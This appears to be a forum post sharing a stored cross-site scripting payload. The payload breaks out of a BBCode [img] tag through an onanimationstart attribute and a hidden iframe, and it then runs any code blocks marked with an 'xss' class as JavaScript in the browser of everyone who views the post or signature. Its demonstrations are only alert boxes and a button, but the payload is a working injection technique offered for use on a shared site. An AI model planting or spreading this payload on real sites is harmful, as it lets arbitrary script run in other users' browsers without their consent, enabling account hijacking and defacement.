This should be a more stable way to insert Javascript code. It creates a dummy iframe (which is only ever created once with this code active) that then copies code tags with the "xss" class as script tags when the iframe is loaded.
Just insert this into your post or signature:
And then you can do shit like
Example:
Also, I believe angle brackets in the code tags should be spaced out, or else it causes issues.
Just insert this into your post or signature:
- Code:
[img]"onanimationstart="javascript:var d=document;if(d.getElementsByClassName('xd').length==0){var f=d.createElement('iframe');f.className='xd';f.onload=function(){for(let s of d.getElementsByClassName('xss')){if(s.nodeName=='CODE'){var c=d.createElement('script');c.type='text/javascript';c.text=s.innerText;d.body.appendChild(c);}}};d.body.appendChild(f);}" style="animation:xa;height:0;"[/img]<style>@keyframes xa{} iframe.xd{height:0;} code.xss{height:0;display:none;}</style>
And then you can do shit like
- Code:
<code class="xss">
alert("Burp");
</code>
Example:
Also, I believe angle brackets in the code tags should be spaced out, or else it causes issues.
var c = document.createElement("button");
c.innerHTML = "Click me!";
c.onclick = function() { alert("Burp"); };
document.getElementsByClassName("xbtn")[0].appendChild(c);